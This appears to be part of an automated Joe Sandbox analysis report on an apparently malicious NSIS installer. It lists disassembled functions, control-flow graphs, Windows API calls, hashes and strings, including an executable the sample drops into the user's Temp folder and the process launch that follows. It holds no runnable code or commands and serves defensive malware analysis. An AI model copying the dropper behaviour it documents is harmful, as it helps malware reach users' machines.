                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$FileWritewsprintf
                                                                                                                        • String ID: ... %d%%
                                                                                                                        • API String ID: 4209647438-2449383134
                                                                                                                        • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                                                                                        • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                                                                                                        • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                                                                                        • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401751 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 507 401751-401774 call 402a29 call 4056f8 512 401776-40177c call 405b98 507->512 513 40177e-401790 call 405b98 call 40568b lstrcatA 507->513 518 401795-40179b call 405dfa 512->518 513->518 523 4017a0-4017a4 518->523 524 4017a6-4017b0 call 405e93 523->524 525 4017d7-4017da 523->525 533 4017c2-4017d4 524->533 534 4017b2-4017c0 CompareFileTime 524->534 526 4017e2-4017fe call 40586f 525->526 527 4017dc-4017dd call 405850 525->527 535 401800-401803 526->535 536 401876-40189f call 404e84 call 402e8e 526->536 527->526 533->525 534->533 537 401805-401847 call 405b98 * 2 call 405bba call 405b98 call 405459 535->537 538 401858-401862 call 404e84 535->538 550 4018a1-4018a5 536->550 551 4018a7-4018b3 SetFileTime 536->551 537->523 570 40184d-40184e 537->570 548 40186b-401871 538->548 553 4028c7 548->553 550->551 552 4018b9-4018c4 FindCloseChangeNotification 550->552 551->552 555 4018ca-4018cd 552->555 556 4028be-4028c1 552->556 558 4028c9-4028cd 553->558 559 4018e2-4018e5 call 405bba 555->559 560 4018cf-4018e0 call 405bba lstrcatA 555->560 556->553 566 4018ea-402246 call 405459 559->566 560->566 566->556 566->558 570->548 572 401850-401851 570->572 572->538
                                                                                                                        APIs
                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00000000,00000000,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                                                                                          • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,jtlkrtaftpgmppuxhth Setup,NSIS Error), ref: 00405BA5
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                          • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                          • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\okawzsv.exe" $C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 1941528284-258611627
                                                                                                                        • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                                                                                        • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                                                                                                        • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                                                                                        • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405346 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 574 405346-405391 CreateDirectoryA 575 405393-405395 574->575 576 405397-4053a4 GetLastError 574->576 578 4053be-4053c0 575->578 577 4053a6-4053ba SetFileSecurityA 576->577 576->578 577->575 579 4053bc GetLastError 577->579 579->578
                                                                                                                        APIs
                                                                                                                        • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                                                                                        • GetLastError.KERNEL32 ref: 0040539D
                                                                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                                                                                                        • GetLastError.KERNEL32 ref: 004053BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                        • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                                                                        • API String ID: 3449924974-4175678751
                                                                                                                        • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                        • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                                                                                                        • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                        • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405EBA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 580 405eba-405eda GetSystemDirectoryA 581 405edc 580->581 582 405ede-405ee0 580->582 581->582 583 405ef0-405ef2 582->583 584 405ee2-405eea 582->584 585 405ef3-405f25 wsprintfA LoadLibraryExA 583->585 584->583 586 405eec-405eee 584->586 586->585
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                                                                                                        • wsprintfA.USER32 ref: 00405F0A
                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                                                                        • API String ID: 2200240437-4240819195
                                                                                                                        • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                        • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                                                                                                        • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                        • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040589E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 587 40589e-4058a8 588 4058a9-4058d3 GetTickCount GetTempFileNameA 587->588 589 4058e2-4058e4 588->589 590 4058d5-4058d7 588->590 592 4058dc-4058df 589->592 590->588 591 4058d9 590->591 591->592
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 004058B1
                                                                                                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058CB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\BMhDm7YW62.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                        • API String ID: 1716503409-3217077291
                                                                                                                        • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                        • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                                                                                                        • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                        • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 676 4015b3-4015c6 call 402a29 call 40571f 681 4015c8-4015db call 4056b6 676->681 682 40161c-40161f 676->682 689 4015f3-4015f4 call 4053c3 681->689 690 4015dd-4015e0 681->690 684 401621-40163c call 401423 call 405b98 SetCurrentDirectoryA 682->684 685 40164a-40219c call 401423 682->685 697 4028be-4028cd 684->697 701 401642-401645 684->701 685->697 698 4015f9-4015fb 689->698 690->689 694 4015e2-4015e9 call 4053e0 690->694 694->689 706 4015eb-4015ec call 405346 694->706 702 401612-40161a 698->702 703 4015fd-401602 698->703 701->697 702->681 702->682 707 401604-40160d GetFileAttributesA 703->707 708 40160f 703->708 711 4015f1 706->711 707->702 707->708 708->702 711->698
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,C:\,00000000,00405783,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                          • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 1892508949-1116454783
                                                                                                                        • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                                                                                        • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                                                                                                        • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                                                                                        • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040576C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 712 40576c-405787 call 405b98 call 40571f 717 405789-40578b 712->717 718 40578d-40579a call 405dfa 712->718 719 4057df-4057e1 717->719 722 4057a6-4057a8 718->722 723 40579c-4057a0 718->723 725 4057be-4057c7 lstrlenA 722->725 723->717 724 4057a2-4057a4 723->724 724->717 724->722 726 4057c9-4057dd call 40568b GetFileAttributesA 725->726 727 4057aa-4057b1 call 405e93 725->727 726->719 732 4057b3-4057b6 727->732 733 4057b8-4057b9 call 4056d2 727->733 732->717 732->733 733->725
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,jtlkrtaftpgmppuxhth Setup,NSIS Error), ref: 00405BA5
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,C:\,00000000,00405783,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                                                                                                        • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057BF
                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                        • String ID: C:\
                                                                                                                        • API String ID: 3248276644-3404278061
                                                                                                                        • Opcode ID: 0c6b5d1daa3c2ede88059e0d3e78c561d31498b229fd294e54aeb43f41febe10
                                                                                                                        • Instruction ID: 54d673280676c30d7487fb506765264cad7adccc2ba99e33922fd806b78c8ed4
                                                                                                                        • Opcode Fuzzy Hash: 0c6b5d1daa3c2ede88059e0d3e78c561d31498b229fd294e54aeb43f41febe10
                                                                                                                        • Instruction Fuzzy Hash: DAF0C829105D509AD222373A5C05ABF2655CE86364F19063BFC55B32D2DB3C8943FD7E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004053F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 735 4053f8-405425 CreateProcessA 736 405433-405434 735->736 737 405427-405430 CloseHandle 735->737 737->736
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040542A
                                                                                                                        Strings
                                                                                                                        • Error launching installer, xrefs: 0040540B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                        • String ID: Error launching installer
                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                        • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                                                                                        • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                                                                                                        • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                                                                                        • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406609 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                                                                                        • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                                                                                                        • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                                                                                        • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040680A Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                                                                                        • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                                                                                                        • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                                                                                        • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406520 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
